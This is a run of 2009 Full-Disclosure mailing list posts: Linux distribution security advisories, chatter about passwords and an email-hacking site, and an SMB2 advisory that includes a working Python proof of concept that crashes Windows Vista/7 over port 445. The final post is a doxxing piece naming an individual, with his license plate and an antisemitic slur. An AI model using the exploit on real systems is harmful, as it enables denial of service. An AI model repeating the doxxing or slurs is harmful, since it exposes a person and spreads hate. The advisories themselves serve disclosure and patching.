-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1884-1secur...@debian.org http://www.debian.org/security/ Nico Golde September 14th, 2009http://www.debian.org/security/faq - -- Package: nginx Vulnerability : buffer underflow Problem type : remote Debian-specific: no CVE ID : CVE-2009-2629 Chris Ries discovered that nginx, a high-performance HTTP server, reverse proxy and IMAP/POP3 proxy server, is vulnerable to a buffer underflow when processing certain HTTP requests. An attacker can use this to execute arbitrary code with the rights of the worker process (www-data on Debian) or possibly perform denial of service attacks by repeatedly crashing worker processes via a specially crafted URL in an HTTP request. For the oldstable distribution (etch), this problem has been fixed in version 0.4.13-2+etch2. For the stable distribution (lenny), this problem has been fixed in version 0.6.32-3+lenny2. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 0.7.61-3. We recommend that you upgrade your nginx packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13.orig.tar.gz Size/MD5 checksum: 436610 d385a1e7a23020d421531818d5606b5b http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2.diff.gz Size/MD5 checksum: 6578 db07ea3610574b7561cbedef09a51bf2 http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2.dsc Size/MD5 checksum: 618 12706d3c92e0c225dd47367aae43115e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_alpha.deb Size/MD5 checksum: 211310 5e7efe11eca1aea2f6611cd913bf519d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_amd64.deb Size/MD5 checksum: 195352 3fc58e180fca1465a360f37bad3da7db arm architecture (ARM) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_arm.deb Size/MD5 checksum: 187144 6e49d62ee4efa11f9b75292bcb3be1d7 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_hppa.deb Size/MD5 checksum: 205204 7f8f76147eccbf489c900831782806c0 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_i386.deb Size/MD5 checksum: 184912 7dc5e3672666d1b5666f6ce79f4c755b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_ia64.deb Size/MD5 checksum: 278490 669e8d9e43a123367c429ca34927e22a mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_mips.deb Size/MD5 checksum: 208238 2e6f25c4bc053d1bb1ac82bec398624d mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_mipsel.deb Size/MD5 checksum: 207640 e6b0e0e8148d1786274cf9a4b7f9d060 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_powerpc.deb Size/MD5 checksum: 186542 5b1460ab8707b1ccb3cf0b75c8ea2548 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_s390.deb Size/MD5 checksum: 199720 8ecde48c393df02819c45bc966f73eae sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch2_sparc.deb Size/MD5 checksum: 185032 15212749985501b223af7888447fc433 Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny2.dsc Size/MD5 checksum: 1238 41197ff9eca3cb3707ca5eff5e431183
[Full-disclosure] Distribution of passwords between man and women
Hi all kind of bad people in this list. Want to share weird thing I discovered today: Men have MUCH worse passwords than females. There is a user database where men to woman ratio is 5.2:1 but men but use last name more often as password. Ratio is 6.2:1. When it somes to bad password like 123456, men used it on 9.3:1 ratio. More details I put on page: http://no.spam.ee/~tonu/passwords.html If you want me run more queries on this DB, mail me in private back and publish them too on same page. Tõnu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-830-1] OpenSSL vulnerability
=== Ubuntu Security Notice USN-830-1 September 14, 2009 openssl vulnerability CVE-2009-2409 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libssl0.9.8 0.9.8a-7ubuntu0.10 Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.8 Ubuntu 8.10: libssl0.9.8 0.9.8g-10.1ubuntu2.5 Ubuntu 9.04: libssl0.9.8 0.9.8g-15ubuntu3.3 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: Dan Kaminsky discovered OpenSSL would still accept certificates with MD2 hash signatures. As a result, an attacker could potentially create a malicious trusted certificate to impersonate another site. This update handles this issue by completely disabling MD2 for certificate validation. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.10.diff.gz Size/MD5:53912 84c43de5b63a047b68f83c9479f52c80 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.10.dsc Size/MD5: 824 bd0f809a8a9ec0a6fd4c68ce1cc9c23f http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a.orig.tar.gz Size/MD5: 3271435 1d16c727c10185e4d694f87f5e424ee1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.10_amd64.udeb Size/MD5: 572072 8db0e65d653897be98bc2fc5e51010c9 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.10_amd64.deb Size/MD5: 2168214 1dcdc2cae2f236fccfc8cfba422273d8 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.10_amd64.deb Size/MD5: 1683086 409706b68f90f2566715651348764831 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.10_amd64.deb Size/MD5: 876718 685efaf5e10b2df809ab8d89aed92c8d http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.10_amd64.deb Size/MD5: 985492 4ef20d832bb7586596c43ec7fe1eaddf i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.10_i386.udeb Size/MD5: 509682 69b88bc8f3f02d9322202c7fecc3e79e http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.10_i386.deb Size/MD5: 2025018 94ccf36bee419689669317f6af6cddd1 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.10_i386.deb Size/MD5: 5055010 ebd707a575dd37ef15da323f755b09d0 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.10_i386.deb Size/MD5: 2597960 7e6dd5bf80c6b19342c5b7904db1099b http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.10_i386.deb Size/MD5: 977266 a7077c30808d8c2d1c9f750ba45e3fc8 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.10_powerpc.udeb Size/MD5: 557976 eb58fa69170eba9840ef9594455ee1e0 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.10_powerpc.deb Size/MD5: 2182792 f3ae318bf1796ac01bc214e7215da90a http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.10_powerpc.deb Size/MD5: 1728540 f687d41c301584f06d58d0cec204c319 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.10_powerpc.deb Size/MD5: 862886 1f0a9bdfd9b748e75eec2999dca6619e http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.10_powerpc.deb Size/MD5: 981388 ff396fdc26a71d3334ddd774053c840c sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.10_sparc.udeb Size/MD5: 531130 e87bcb6eec930479fb51de3cbcb9a21d http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.10_sparc.deb Size/MD5: 2093978 ca7afb5ea04f644bcef1408fad4e515a http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.10_sparc.deb Size/MD5: 3943900 08867a94f7a1da4c934d8bc42a0bc640 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.10_sparc.deb Size/MD5: 2093246 8b61fac1d890bb269a98d70186582212
[Full-disclosure] [USN-831-1] OpenEXR vulnerabilities
=== Ubuntu Security Notice USN-831-1 September 14, 2009 openexr vulnerabilities CVE-2009-1720, CVE-2009-1721, CVE-2009-1722 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libopenexr2ldbl 1.2.2-4.4ubuntu1.1 Ubuntu 8.10: libopenexr6 1.6.1-3ubuntu1.8.10.1 Ubuntu 9.04: libopenexr6 1.6.1-3ubuntu1.9.04.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Drew Yao discovered several flaws in the way OpenEXR handled certain malformed EXR image files. If a user were tricked into opening a crafted EXR image file, an attacker could cause a denial of service via application crash, or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2009-1720, CVE-2009-1721) It was discovered that OpenEXR did not properly handle certain malformed EXR image files. If a user were tricked into opening a crafted EXR image file, an attacker could cause a denial of service via application crash, or possibly execute arbitrary code with the privileges of the user invoking the program. This issue only affected Ubuntu 8.04 LTS. (CVE-2009-1722) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openexr/openexr_1.2.2-4.4ubuntu1.1.diff.gz Size/MD5:14554 bcb5ecaf21b59a7710683a68aba0bb2b http://security.ubuntu.com/ubuntu/pool/main/o/openexr/openexr_1.2.2-4.4ubuntu1.1.dsc Size/MD5: 854 79f78a28a14dc93802a157e8e07da8b2 http://security.ubuntu.com/ubuntu/pool/main/o/openexr/openexr_1.2.2.orig.tar.gz Size/MD5: 9324108 a2e56af78dc47c7294ff188c8f78394b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openexr/libopenexr-dev_1.2.2-4.4ubuntu1.1_amd64.deb Size/MD5: 520502 bc8ae0a36129711cf8d3fe76ce9ba08a http://security.ubuntu.com/ubuntu/pool/main/o/openexr/libopenexr2ldbl_1.2.2-4.4ubuntu1.1_amd64.deb Size/MD5: 286262 9f04235664daaae9a7f7e7b73380c48c http://security.ubuntu.com/ubuntu/pool/universe/o/openexr/openexr_1.2.2-4.4ubuntu1.1_amd64.deb Size/MD5: 734166 1f69f5a3df60c97112ae6cd10703c57e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openexr/libopenexr-dev_1.2.2-4.4ubuntu1.1_i386.deb Size/MD5: 489298 bf984b8b16376d340a740e53604cfdac http://security.ubuntu.com/ubuntu/pool/main/o/openexr/libopenexr2ldbl_1.2.2-4.4ubuntu1.1_i386.deb Size/MD5: 287666 f450d951805adacac919a4200e4079c8 http://security.ubuntu.com/ubuntu/pool/universe/o/openexr/openexr_1.2.2-4.4ubuntu1.1_i386.deb Size/MD5: 731418 50a185e5cbef2dde80897bd3b794bca5 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/o/openexr/libopenexr-dev_1.2.2-4.4ubuntu1.1_lpia.deb Size/MD5: 489194 c3204af1c07b5e8d91c77e8afc7f493b http://ports.ubuntu.com/pool/main/o/openexr/libopenexr2ldbl_1.2.2-4.4ubuntu1.1_lpia.deb Size/MD5: 287298 7c2fc36791080636a0bbe7278ed42555 http://ports.ubuntu.com/pool/universe/o/openexr/openexr_1.2.2-4.4ubuntu1.1_lpia.deb Size/MD5: 731534 57578bfd60be8abf7fcda8d5bafef26f powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/o/openexr/libopenexr-dev_1.2.2-4.4ubuntu1.1_powerpc.deb Size/MD5: 589576 90a3f35339b108824d79a0f0107a12cf http://ports.ubuntu.com/pool/main/o/openexr/libopenexr2ldbl_1.2.2-4.4ubuntu1.1_powerpc.deb Size/MD5: 364716 0887057dc3b0d4e0ffee844453729327 http://ports.ubuntu.com/pool/universe/o/openexr/openexr_1.2.2-4.4ubuntu1.1_powerpc.deb Size/MD5: 754718 f7392e608b57a36e331a6fd704fd0345 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/o/openexr/libopenexr-dev_1.2.2-4.4ubuntu1.1_sparc.deb Size/MD5: 538130 448b7ce51d6dd79d945da1e3e79558f1 http://ports.ubuntu.com/pool/main/o/openexr/libopenexr2ldbl_1.2.2-4.4ubuntu1.1_sparc.deb Size/MD5: 348778 438f6f0bf164bfbfc5d6231ae9812d61 http://ports.ubuntu.com/pool/universe/o/openexr/openexr_1.2.2-4.4ubuntu1.1_sparc.deb Size/MD5: 732896 b3032617d77a87167a5b324df68cfebc Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openexr/openexr_1.6.1-3ubuntu1.8.10.1.diff.gz Size/MD5:10364 e9b92379d848ea8041bb24f373abce27 http://security.ubuntu.com/ubuntu/pool/main/o/openexr/openexr_1.6.1-3ubuntu1.8.10.1.dsc Size/MD5: 1435 447d6de5b9270ee023190c6f6d4c5fd4
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
Scratch that - the version of 2008 I had wasn't an official R2 release. So
original reports still hold. It didn't crash my R2 build 7600.
Laurent, et al, has this been tried against an Itanium machine? Just
curious. Nobody at work will let me test the exploit against their Itanium
servers.
Randy
On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
After testing my version of the exploit (using Java instead of Python) I
tried it against a Windows Server 2008 R2 installation - it went down.
http://www.procyonlabs.com/software/smb2_bsoder
Randy
laurent gaffie wrote:
Advisory updated :
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=
I. VULNERABILITY
-
Windows Vista, Server 2008 R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.
III. DESCRIPTION
-
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
SMB server, and it's used to identify the SMB dialect that will be used
for futher communication.
IV. PROOF OF CONCEPT
-
Smb-Bsod.py:
#!/usr/bin/python
#When SMB2.0 recieve a char in the Process Id High SMB header
field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be \x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB
enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
R2, Windows 7 RC.
VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx
VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com
X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release
XI. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not
BSOD:
It wont be done, if they find a way to execute code, they will publish
them advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
D-vice lord@gmail.com wrote: To Dan, being well known is now the same as having your ass handed to ya by the like of me now that we banned n3td3v can we ban dan kaminsky as well? ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hack-Mail.net or similar site
On Sat, Sep 12, 2009 at 7:08 PM, Andrew Farmer andf...@gmail.com wrote: So, in other words, they're spoofing From addresses for profit. Clever. I never tried them. I will just for fun (with my email address). Perhaps they are doing something more smart (like brute forcing with dictionary, use some virus or web attack or something else). Mamo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hack-Mail.net or similar site
From: mamo mam...@gmail.com Subject: Re: [Full-disclosure] Hack-Mail.net or similar site Date: Mon, 14 Sep 2009 23:20:24 +0200 On Sat, Sep 12, 2009 at 7:08 PM, Andrew Farmer andf...@gmail.com wrote: So, in other words, they're spoofing From addresses for profit. Clever. I never tried them. I will just for fun (with my email address). Perhaps they are doing something more smart (like brute forcing with dictionary, use some virus or web attack or something else). Mamo tell us how it went, my guess was also that they are just setting that from= address and that's it, so you don't get a working password after all. but i have no 20$ to test it. :f maxigas ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:233 ] kernel
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:233 http://www.mandriva.com/security/ ___ Package : kernel Date: September 14, 2009 Affected: 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability was discovered and corrected in the Linux 2.6 kernel: The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation on a PF_PPPOX socket. (CVE-2009-2692) To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692 ___ Updated Packages: Mandriva Linux 2008.1: 09f9ce71fb6eaec4ba06acde23ade724 2008.1/i586/kernel-2.6.24.7-3mnb-1-1mnb1.i586.rpm ae602cc8d9699174f7a547bb60e6aded 2008.1/i586/kernel-desktop-2.6.24.7-3mnb-1-1mnb1.i586.rpm 07852147042399185c1854c436206cad 2008.1/i586/kernel-desktop586-2.6.24.7-3mnb-1-1mnb1.i586.rpm d2da36f55db468e58cb000f9f4b9b163 2008.1/i586/kernel-desktop586-devel-2.6.24.7-3mnb-1-1mnb1.i586.rpm cdacb4f44b0c88054866e168201af62e 2008.1/i586/kernel-desktop586-devel-latest-2.6.24.7-3mnb1.i586.rpm 5b1e613192c0b43d39e5d1cf44dee7bc 2008.1/i586/kernel-desktop586-latest-2.6.24.7-3mnb1.i586.rpm 8663e4966000f62a9d7e0f73ad0b5adb 2008.1/i586/kernel-desktop-devel-2.6.24.7-3mnb-1-1mnb1.i586.rpm e8fac7b0eb07e205af711bca89b60a28 2008.1/i586/kernel-desktop-devel-latest-2.6.24.7-3mnb1.i586.rpm e5f9266b2244a26c1d90ec87976fc5b0 2008.1/i586/kernel-desktop-latest-2.6.24.7-3mnb1.i586.rpm 0c3d5a8181efe5b10e3afec16691fa4d 2008.1/i586/kernel-doc-2.6.24.7-3mnb1.i586.rpm db1296432ff88aa33410c8d3a1b1a2c0 2008.1/i586/kernel-laptop-2.6.24.7-3mnb-1-1mnb1.i586.rpm 0193271cabdc1f547a3432e8a99986b9 2008.1/i586/kernel-laptop-devel-2.6.24.7-3mnb-1-1mnb1.i586.rpm bdfab6a2386fa89dd250a494e725a5d9 2008.1/i586/kernel-laptop-devel-latest-2.6.24.7-3mnb1.i586.rpm 7ed708045f382289fbd0e10a0ae9 2008.1/i586/kernel-laptop-latest-2.6.24.7-3mnb1.i586.rpm 688c23aa32b234d6581a76adbe66ea8c 2008.1/i586/kernel-server-2.6.24.7-3mnb-1-1mnb1.i586.rpm 32f1a47070ee2a7f83a016d001bff014 2008.1/i586/kernel-server-devel-2.6.24.7-3mnb-1-1mnb1.i586.rpm 04a464bf850a840fa27f5cf6068dccc4 2008.1/i586/kernel-server-devel-latest-2.6.24.7-3mnb1.i586.rpm f82288c9d9d250d6a01ff44bb98ea3ee 2008.1/i586/kernel-server-latest-2.6.24.7-3mnb1.i586.rpm a05598c1a1b1cef7c98f65b284a86cb5 2008.1/i586/kernel-source-2.6.24.7-3mnb-1-1mnb1.i586.rpm 9ecb21b4c7fc58cc8231fb9979bed563 2008.1/i586/kernel-source-latest-2.6.24.7-3mnb1.i586.rpm 2f39f719d288c36c7600ce1ff3ce98b8 2008.1/SRPMS/kernel-2.6.24.7-3mnb1.src.rpm Mandriva Linux 2008.1/X86_64: ee40c52e1e9d7df0ff082c1132f78ca7 2008.1/x86_64/kernel-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm 62e03fc5353c7091da3f1e3d8684482b 2008.1/x86_64/kernel-desktop-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm 53e78922ee128c8dd01fb992df712122 2008.1/x86_64/kernel-desktop-devel-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm 0da13998db3248630fa0da98f9061b2c 2008.1/x86_64/kernel-desktop-devel-latest-2.6.24.7-3mnb1.x86_64.rpm 81b720b2da87dcaa3c9a06522e3f106c 2008.1/x86_64/kernel-desktop-latest-2.6.24.7-3mnb1.x86_64.rpm f72b340ae0e01ed73d64e8f2962b4b4a 2008.1/x86_64/kernel-doc-2.6.24.7-3mnb1.x86_64.rpm 3c9cf5d346d4fc5df58633d4a70abe27 2008.1/x86_64/kernel-laptop-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm 8c3c36e81f42d1c2f29c9ed27200a9d8 2008.1/x86_64/kernel-laptop-devel-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm 751574973fc2aa889bbd7971bbc61596 2008.1/x86_64/kernel-laptop-devel-latest-2.6.24.7-3mnb1.x86_64.rpm 476b32a7eab657d18185f83f0faed3bc 2008.1/x86_64/kernel-laptop-latest-2.6.24.7-3mnb1.x86_64.rpm acc8e71cda1807fc12ec2c376adfd7e5 2008.1/x86_64/kernel-server-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm 3f0dec17ff7636efc8e848bcc2dd5b44 2008.1/x86_64/kernel-server-devel-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm dca5c6a627768b204f01076c4d237e03 2008.1/x86_64/kernel-server-devel-latest-2.6.24.7-3mnb1.x86_64.rpm d450db60670cc44a5bcd1291b6fba03e 2008.1/x86_64/kernel-server-latest-2.6.24.7-3mnb1.x86_64.rpm de4226fc5ba36a84e332f2a5afdf2212 2008.1/x86_64/kernel-source-2.6.24.7-3mnb-1-1mnb1.x86_64.rpm 6e27e3e78a54a1e94e6c12716771c5a5
[Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
___ ___ _ | __ | | |__] |__] ||___ [__ |__] |__| |__] |__] |___ |___ ___] _ _ ___ _ ___ _ |__| |\ | | \ | | \ | | | | \| |__/_| |__/ |___ Presents = Meet the exposed Andrew Aurenheimer. Also known as weev, weevlar, weevlos, wbeelsoi. Former bantown member and a sysop at encyclopediadramatica. He is a failed man. Loyalty to him shall bring you no benefit. See for yourself: Law enforcement authorities reportedly have identified a 21-year- old Vancouver man as the individual who made two threatening telephone calls to Congregation Beth Israel on the night of June 16. Jewish Federation of Greater Portland Community Relations Director Robert Horenstein said the suspect, whose name was not made public, “admitted making the calls and the FBI is now working with the U.S. Attorney’s office to determine if a crime has been committed.” The alleged caller, whom authorities described to Horenstein as having “low intelligence and no means to carry out any threats,” reportedly said over the phone, “The Nazis are coming to get you; there will be another Holocaust” and “You killed my Lord. You will pay.” The calls were left on the CBI’s voice mail system and were first heard the next morning by Rabbi Michael Cahana. Cahana said, “I was very, very pleased at the responsiveness of the Portland Police and FBI. They gave us a strong sense that they were taking this seriously and we were in very good hands.” The rabbi declined to elaborate on the incident. Portland FBI spokeswoman Beth Anne Steele said her office could not comment on an ongoing investigation but that the FBI was “working closely with the folks at the temple as well as the Portland Police Bureau.” Prior to police identification of the Vancouver man, Horenstein said in an e-mail alert that law enforcement officials had speculated the caller may have been a 24-year-old Los Angeles man who operates the Web site theiprophet.blip.tv/ (since taken offline) on which Jews have been vilified. Horenstein identified that man as Andrew Auernheimer. In a video that was on Auernheimer’s Web site he said, “I’ve got to skip town. There are some big Jews that want to hand me a summons. …On the 16th (of June) I am taking a pilgrimage northward to Portland.” Auernheimer was detained and questioned by members of the FBI and the Portland Police Bureau, first in Grants Pass and later in Wilsonville, according to Horenstein. Horenstein said, “Portland police now believe him to be a much lower-level threat than was believed previously, but stress that they will continue to monitor him.” Auernheimer reportedly was warned not to go near any Jewish congregation or agency. Horenstein said he was told that Auernheimer had no plans to do so and that he claimed “he has no violent intentions.” Horenstein said Auernheimer drives a 2000 silver Honda Civic with California license plate 6EFJ814 and was traveling with a Native American woman. He said that if Auernheimer is seen near any Jewish facility, authorities should be notified immediately by calling 911. Horenstein expressed gratitude for the work of the law enforcement personnel: “We should all be deeply grateful to the FBI and Portland police, especially officers Brian Hughes and Tony Cavalli, for their commitment to keeping us all safe.” Hughes referred inquiries to PPB spokeswoman Det. Mary Weed who did not return telephone calls before the Jewish Review’s press time. Source: http://www.jewishreview.org/local/Police-question-two-men- about-threats-to-Jewish-community Archival: http://www.webcitation.org/5jnPBPyHG Weev's response: look at these fucking kikes how they fucking don't name the person who made the threats, but name me instead. it looks like i was responsible for it unless you read the article real hard. i've been informed that the person who called in the synagogue threats was someone being blackmailed by a rabbi, and that he was assured immunity. this was a setup from the beginning to get me on the counterterrorism map so they could have my assets stolen and me criminally harassed. seriously, there has to be something fucking libelous in the fact that i am the sole person named in this article when i had absolutely no involvement in it, and was not charged with any crime. there is no fucking freedom of speech left in this country. if saying anything the establishment doesn't like results in attacks on someone's livelihood, noone will speak up against the criminal establishment. Source: http://weev.livejournal.com/368013.html Archival: http://www.webcitation.org/5jnP71qsD Also weev posts his IRL name+handle on 